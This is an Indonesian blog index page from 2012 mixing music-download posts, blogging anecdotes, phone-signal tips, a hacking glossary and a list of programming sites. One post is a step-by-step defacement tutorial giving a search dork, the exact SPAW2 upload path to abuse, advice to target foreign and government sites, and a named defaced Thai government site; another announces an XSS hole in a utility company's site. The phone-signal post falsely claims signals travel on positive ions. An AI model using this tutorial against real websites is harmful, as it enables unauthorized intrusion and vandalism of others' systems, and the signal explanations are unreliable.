Pasang iklan Anda di sini.
http://goo.gl/ad3AU2

22 Avenged Sevenfold - Sounding The Seventh Trumpet Full Album

Selasa, Juli 31, 2012
Avenged Sevenfold - Sounding The Seventh Trumpet Full Album | Cirebon-Cyber4rt - Pada kesempatan kali ini saya akan posting tentang album pertama grup band favorite saya, Avenged Sevenfold atau kalo diartikan ke bahasa Indonesia ( Dibalas Tujuh Kali Lipat ) hahahaa7x  =D

http://cirebon-cyber4rt.blogspot.com/2012/07/avenged-sevenfold-sounding-seventh.html

Saya suka grup band metal ini sejak duduk dibangku kelas 3 SMP dan sampai sekarang pun masih suka  hehehe. Dan lagu pertama yang saya dengar dari grup band A7X ini adalah A Little Peace of Heaven. Sejak saat itu saya searching ke Google tentang latar belakang band ini, mendownload lagu-lagunya, videonya juga dan akhirnya saya pun kecanduan dengan alunan musiknya.

Nah, berikut saya akan kasih link download album pertama grup band Avenged Sevenfold yang berjudul Sounding The Seventh Trumpet yang diriilis pada tahun 2001.

Download Link :
Daftar Lagu di Album Sounding The Seventh Trumpet :
  • To End The Rapture
  • Turn the Other Way
  • Darkness Surrounding
  • The Art of Subconcious Illusion
  • We Come Out at Night
  • Lips of Deceit
  • Warmness On the Soul
  • An Epic of Time Wasted
  • Breaking Their Hold
  • Forgotten Faces
  • Thick and Thin
  • Streets
  • Shattered by Broken Dreams
Bagi kalian yang ngefans sama Avenged Sevenfold dan bingung mau download semua albumnya, stay tune aja di Blog Cirebon-Cyber4rt, karena saya selaku admin yang paling ganteng akan ngeshare semua albumnya.

Ok Deh, sekian dulu aja postingan saya kali ini tentang Avenged Sevenfold - Sounding The Seventh Trumpet Full Album, semoga dapat bermanfaat, Salam \m/



116 Cara Deface Website Melalui Spaw Uploads Vulnerability

Sabtu, Juli 21, 2012
http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html
Cara Deface Website Melalui Spaw Uploads Vulnerability | Cirebon-Cyber4rt - Hallo sobat, udah seminggu ini ane ngga ngepost nih. Kali ini saya mau share tutorial deface sob, nama teknik defacenya yaitu Deface Website Melalui Spaw Uploads Vulnerability.

Yaudah deh, dari pada lama-lama ngoceh ngga jelas, mending langsung ke tkp aja gan. Berikut Cara Deface Website Melalui Spaw Uploads Vulnerability Cekidot :D

1). Pertama, Masukan Dorknya :

inurl:”spaw2/uploads/files/”

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p

Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. Jadi hasilnya begini :

inurl:”spaw2/uploads/files/” site:th

Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.my, site:jp, site:gov.cn etc asal jangan site:co.id yah !

2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :

http://contoh.com/spaw2/uploads/files/

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

3). Ganti pada Bagian 
/spaw2/uploads/files/ dengan kode dibawah ini :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Sehingga Menjadi Seperti Ini :

http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

4).
Tekan Enter, Nanti akan Terbuka Seperti Ini :

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.


http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

6). 
Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

7). Selanjutnya Klik Tombol Upload.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

9). Selesai, dan Hasilnya :

http://www.dtam.moph.go.th/

http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

Mungkin orang mengira saya gila tutor, segampang ini harus diperjelas seperti ini. Tapi inilah saya, sosok yang tidak sempurna dan masih banyak kekurangan. Saya hanya ingin memperjelas kepada sobat semua agar sobat bisa mengerti dengan jelas.

Karena dari pengalaman saya dulu saat menjadi newbie ( Sekarang pun Masih Newbie ) susah sekali mencari tutor yang sangat mudah untuk dimengerti, cari sana-sini tapi hasil tetap 0.

Maka tujuan saya menulis tutorial ini biar sobat-sobat semua yang masih pemula ( Bukan saya sok, saya juga masih belajar ) dan masih belajar bisa mengerti.

Sekian Postingan saya kali ini tentang Cara Deface Website Melalui Spaw Uploads Vulnerability, semoga dapat bermanfaat bagi sobat semua.

Source : Hacker Newbie



31 Download Lagu Dear God Versi Indonesia Mp3 Gratis

Jumat, Juli 13, 2012
Download Lagu Dear God Versi Indonesia Mp3 Gratis | Cirebon-Cyber4rt - Bagi yang ngefans sama grup band Avenged Sevenfold, pasti sudah ngga asing lagi dengan lagu yang satu ini... lirik lagu yang merdu dan diiringi alunan gitar membuat suasana hati menjadi tenang hehehe :D

http://cirebon-cyber4rt.blogspot.com/2012/07/download-lagu-dear-god-versi-indonesia.html
Dear God Versi Indonesia Mp3

Tapi, bagi sobat yang belum begitu ngerti arti liriknya karena menggunakan bahasa Inggris... tenang aja, Udah ada versi bahasa Indonesia kok dan penyanyinya bukan M Shadows lhoh, tapi orang Indonesia tentunya.

Bagi sobat yang penasaran bagaimana Lagu Dear God Versi Indonesia, silahkan download melalui link yang sudah saya sediakan dibawah ini :

Download Link :
Meskipun penyanyinya bukan M Shadows ( Vocalis Avenged Sevenfold ) tapi suaranya lumayan mirip dengan dia. Dan yang penting kita harus memberikan apresiasi atas karyanya :D

Sekian postingan saya kali ini tentang Download Lagu Dear God Versi Indonesia Mp3 Gratis, semoga dapat bermanfaat bagi kita semua.



53 Fakta-Fakta Menarik Tentang Blogger Malaysia

Selasa, Juli 10, 2012
Fakta-Fakta Menarik Tentang Blogger Malaysia | Cirebon-Cyber4rt - Hallo, ketemu lagi bareng admin paling ganteng se-kota Cirebon hehee :p kali ini saya akan menceritakan sedikit pengalaman saya didunia blogging. Dan yang akan saya ceritakan ini adalah sedikit pengalaman saya tentang para blogger negara tetangga kita 'Malaysia'. Ok Langsung aja ke tkp gan =))

http://cirebon-cyber4rt.blogspot.com/2012/07/fakta-fakta-menarik-tentang-blogger.html

Berikut Fakta-Fakta Menarik Tentang Blogger Malaysia :

Saya sempat kagum dengan blogger malasyia yang rata-rata adalah wanita, jarang sekali saya temui blogger pria, yaa... 1 - 3 orang sih pernah lah nemuin. Berbeda dengan negara kita yang rata-rata bloggernya adalah pria ( No Maho Please ) hahaha :p

Ini yang paling bikin saya kesal, mereka ( Blogger Malaysia ) memasang gambar diblog yang gambarnya gede-gede banget gan, entah itu foto pribadi, animasi upin-ipin, gambar lope yang ampe nutupin hampir setengah tampilah layar XD

Ini mungkin salah satu efek karena 'Mereka' terlalu banyak menghias blognya dengan sesuatu yang oversize. Ngga hanya gambar yang berukuran besar, mereka juga memasang lagu... Makin berat aja deh -_-".

Tapi selidik punya selidik ternyata kecepatan akses internet disana lumayan cepet gan, beda dengan kecepatan akses internet negara kita ini... LEMOOT :'( Jadi mungkin Internet Service Provider juga punya andil besar disini.

Yupp, Ngga aneh lagi kalo setiap blog malaysia yang kita kunjungi pasti punya puluhan followers bahkan sampe puluhan ribu ( Pengalaman Ane ) :D Bahkan waktu tahun 2010 lalu ada seorang blogger Malasyia yang masuk majalah terkemuka disana, karena followers blognya banyak =))

Salut deh, hanya karena banyak followers blog aja bisa masuk majalah terkemuka (y). Gimana ngga seneng gan hahaha :D

Itulah tadi beberapa fakta menarik tentang blogger malaysia. Postingan ini hanyalah cerita tentang pengalaman saya selama didunia blogging, dan saya tidak ada niatan untuk menjatuhkan reputasi blogger negara tetangga kita, hanya sekedar memberikan sedikit kisah menarik pengalaman saya hehehe :)

Sekian postingan saya kali ini tentang Fakta-Fakta Menarik Tentang Blogger Malaysia, saya mohon maaf kalo ada kata-kata yang kurang berkenan, Semoga bermanfaat :)



14 Tips Sederhana Mengatasi Gangguan Sinyal Pada Handphone

Selasa, Juli 10, 2012
Tips Sederhana Mengatasi Gangguan Sinyal Pada Handphone | Cirebon-Cyber4rt - Tips Sederhana Mengatasi Gangguan Sinyal Pada Handphone - SMS yang tidak bisa terkirim maupun tidak bisa kita terima merupakan hambatan yang bisa dibilang sangat sepele tapi begitu penting. Hal ini biasanya terjadi dikarenakan sinyal handphone sobat terganggu. Sebelum berlanjut ke tips menguatkan sinyal handphone, ada baiknya kita ketahui bersama beberapa hal yang berhubungan dengan sinyal handphone.

http://cirebon-cyber4rt.blogspot.com/2012/07/tips-sederhana-mengatasi-gangguan.html
Sinyal Handphone
Kondisi ruang tertutup dan kedap suara dapat menyebabkan susah diterimanya sinyal handphone. Walaupun ada beberapa balok sinyal yang masuk hehehe :D tetapi kondisinya lemah dan handphone pun tidak bisa digunakan untuk layanan komunikasi. Jadi untuk itu disarankan untuk keluar ruangan sementara jika ingin melakukan komunikasi.

Cuaca Alam sangat berpengaruh terhadap penhantaran sinyal, karena sinyal handphone dihantantarkan oleh ion-ion positif yang bertebaran di udara. Saat terjadi mendung, hujan dan angin kencang, dapat mengakibatkan susunan ion yang tidak beraturan, sehingga menimbulkan gangguan terhadap penerimaan sinyal handphone.

Handphone yang sering terjatuh dan tercelup kedalam air dapat menyebabkan kerusakan pada headset handphone sobat dan jika ini terjadi berulang kali, akan menimbulkan sinyal handphone sukar untuk ditangkap dan pada kondisi ini sebaiknya segera diperbaiki atau membeli yang baru :D

Kita pasti pernah mendengar istilah Blank Spot. Itu lho, kondisi dimana daerah yang tidak dicover oleh gelombang operator. Hal ini biasanya terjadi didaerah yang tergolong pelosok, tapi dengan catatan terletak didaerah dimana kondisi datarannya cekung yang tidak dilalui sinyal.

Nah, diatas tadi adalah beberapa faktor yang mempengaruhi kuat dan lemahnya sinyal yang diterima oleh handphone kita. Dan untuk mengatasi atau memperbaiki keadaan tersebut, berikut beberapa hal yang dapat sobat coba lakukan dirumah.


[+] Pertama, dengan Menggunakan Aluminium Kaleng Susu.
Menambahkan sedikit lempengan alumunium yang umumnya bisa kita dapatkan dari penutup kaleng susu atau bungkus berbagai makanan dengan bahan alumunium foil. Nah, alumunium in idapat diletakan dibagian belakang handphone, tanpa harus mengganggu elemen pin baterai.

[+] Kedua, dengan "Kawat Melingkar Berpilin".
Dengan membuat lingkaran sederhana menyerupai per yang dibuatkan dari bahan kawat. Lalu kemudian masukan handphone ditengah-tengahnya. Dengan cara sederhana ini dapat menguatkan sinyal untuk terima dan kirim SMS.

Sekian postingan saya tentang Tips Sederhana Mengatasi Gangguan Sinyal Pada Handphone, selamat mencoba dan semoga dapat bermanfaat bagi sobat semua.

Source: Alrezacell



14 XSS Vulnerability pada Website PT. PLN Persero

Senin, Juli 09, 2012
XSS Vulnerability pada Website PT. PLN Persero | Cirebon-Cyber4rt - Masih membahas tentang hacking lagi sob, ternyata pada website PLN ( Perusahaan Listrik Negara ) memiliki celah, terutama pada XSS nya. Cekidoot !

Screenshot :
http://cirebon-cyber4rt.blogspot.com/2012/07/xss-vulnerability-pada-website-pt-pln.html
PT. PLN Persero Website XXSED by Cirebon-Cyber4rt

Proof of Concept :
Sekecil apapun celah keamanan pada website, pasti kalau dibiarkan terus/tidak pernah dipatch akan menjadi sasaran empuk bagi para attacker yang tidak bertanggung jawab.

Sekian postingan saya saya kali ini tentang XSS Vulnerability pada Website PT. PLN Persero, semoga dapat memberikan sedikit wawasan bagi kita semua :)



27 Istilah-Istilah dalam Dunia Hacking yang Perlu Kamu Ketahui

Minggu, Juli 08, 2012
Istilah-Istilah dalam Dunia Hacking yang Perlu Kamu Ketahui | Cirebon-Cyber4rt - Sobat mau belajar tentang hacking? Nah kalo sobat mau belajar tentang ilmu yang satu ini, Sobat perlu mengenal dan mengetahui Istilah-Istilah dalam Dunia Hacking agar sobat tidak bingung ketika mempelajari dunia hacking itu sendiri.

http://cirebon-cyber4rt.blogspot.com/2012/07/istilah-istilah-dalam-dunia-hacking.html

Berikut Istilah-Istilah dalam Dunia Hacking yang Perlu Kamu Ketahui :

1). Bug
-> Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.

2). Patch
-> Perbaikan terhadap bug dengan mengupdate sistem yang memiliki vurnerable system.

3). Vurnerable
-> Sistem yang memiliki bug sehingga rentan terhadap serangan.

4). RFI
-> Penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load.

5). LFI
-> Suatu bug dimana kita bisa menginclude kan file (file yang berada didalam server yg bersangkutan) ke page yang vulnerable ( Vulnerable LFI maksudnya ).

6). SQL Injection
-> Salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server.

7). DDoS
-> Membuat suatu sistem crash & karena overload sehingga tidak bisa diakses atau mematikan service.

8). Shell
-> Inti dari sistem operasi. Shell dapat digunakan untuk mengendalikan kerja sistem operasinya.

9). Deface
-> Merubah tampilan halman suatu website secara paksa dan illegal.

10). Debug
-> Kegiatan mencari bug pada aplikasi dan memperbaiki bug yang ditemukan.

11). XSS
-> Adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client.

12). Phising
-> Adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.

13). Keylogger
-> Adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata)

14). Fake Login
-> Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email n password Friendster, Facebook, dll.

15). Fake Process
-> Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem.
Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax", proses "./backdoor" berubah menjadi "usr/sbin/httpd".

16). Malicious Code/Script
-> Kode yang dibuat untuk tujuan jahat atau biasa disebut kode jahat.

17). Virus
-> Kode jahat yang sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yang diinfeksinya. File yang terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yang memeriksa crc32 dari dirinya.

18). Worm
-> Kode jahat yang sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.

19). Trojan
-> Kode jahat yang sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.

20). Backdoor
-> Pintu belakang untuk masuk ke sistem yang telah brhasil di exploitasi oleh attacker. Bertujuan untuk jalan masuk lagi ke sistem korban sewaktu-waktu.

Sebetulnya istilah-istilah dalam dunia hacking itu banyak, tapi hanya 20 point saja yang saya tulis disini, dan untuk istilah hacking lainnya, sobat bisa cari digoogle. Sekian postingan saya kali ini tentang Istilah-Istilah dalam Dunia Hacking yang Perlu Kamu Ketahui, kurang lebihnya saya mohon maaf, wassalam :)

Source: Hacker Newbie



28 5 Situs Tutorial Pemrograman Berbahasa Indonesia

Sabtu, Juli 07, 2012
5 Situs Tutorial Pemrograman Berbahasa Indonesia | Cirebon-Cyber4rt - Bagi yang mau belajar pemrograman tapi bingung nyari tutornya, ngga usah khawatir... karena di Indonesia banyak kok situs-situs yang membahas tentang pemrograman. Nah berikut 5 Situs Tutorial Pemrograman Berbahasa Indonesia yang mungkin bisa jadi referensi sobat.

Berikut 5 Situs Tutorial Pemrograman Berbahasa Indonesia :

http://cirebon-cyber4rt.blogspot.com/2012/07/5-situs-tutorial-pemrograman-berbahasa.html

1. Ilmukomputer.com
Download berbagai materi kuliah untuk jurusan ilmu komputer/IT, di situs ini disediakan e-book-e-book siap download hasil tulisan dari para penulis-penulis yang mengirimkan tutorialnya. Materi yang dapat dikirimkan adalah semua materi yang ada di dalam jurusan Ilmu Komputer.

Untuk situsnya, bisa dikunjungi di http://ilmukomputer.com/

2. Jagocoding.com
Jagocoding.com adalah situs tutorial pemrograman pertama di Indonesia yang berbasis jejaring sosial (social network). User dapat membuat tutorial dan mempublikasikannya di internet secara langsung, dengan approval dari administrator untuk memenuhi standar kelayakan tutorial. Fitur lainnya adalah, user yang telah terdaftar dapat memfollow kontributor, memberikan komentar, diskusi, dan sebagainya. User dapat mengunduh/download ebook setiap tutorial dalam bentuk PDF. Tutorial yang disajikan adalah semua tutorial pemrograman, mulai dari web, desktop, maupun mobile.

Untuk situnya, bisa dikunjungi di http://jagocoding.com/

3. Makkul.com
Makkul.com adalah sebuah blog yang berisi artikel mengenai PHP dan MySQL,Java,ASP disertai dengan penjelasan dan contoh kasus. User yang tidak terdaftar dapat memberikan komentar, tetapi tidak bisa memposting tutorial sendiri. Karena sebenarnya ini adalah blogspot dengan artikel-artikel berisi tutorial pemrograman.

Untuk situsnya, bisa dikunjungi di http://makkul.com/

4. Myphptutorials.com
Situs yang berisi semua tutorial PHP beragam. Walaupun intinya adalah tutorial PHP, tetapi sebenarnya yang dipelajari di sini adalah semua tutorial tentang bagaimana membuat website, jadi dipelajari juga CSS, Javascript, dan sebagainya. Intinya, di sini adalah tutorial web, tidak terdapat mobile dan desktop.

Untuk situsnya, bisa dikunjungi di http://www.myphptutorials.com/

5. Ilmuwebsite.com
Ilmuwebsite.com hampir mirip dengan situs myphptutorials.com. Pada situs ini berisi tutorial-tutorial semua yang berkaitan dengan website, dengan disediakan demo dan link download. Website ini sebenarnya adalah wordpress, jadi tidak ada halaman login untuk user. User tidak bisa interaksi terhadap user lain.

Untuk situsnya, bisa dikunjungi di http://www.ilmuwebsite.com/

Itulah tadi 5 Situs Tutorial Pemrograman Berbahasa Indonesia yang bisa menjadi bahan referensi sobat untuk belajar tentang pemrograman. Sekian postingan saya kali ini semoga dapat bermanfaat :D

Source: DevilzC0de



Contact

Nama

Email *

Pesan *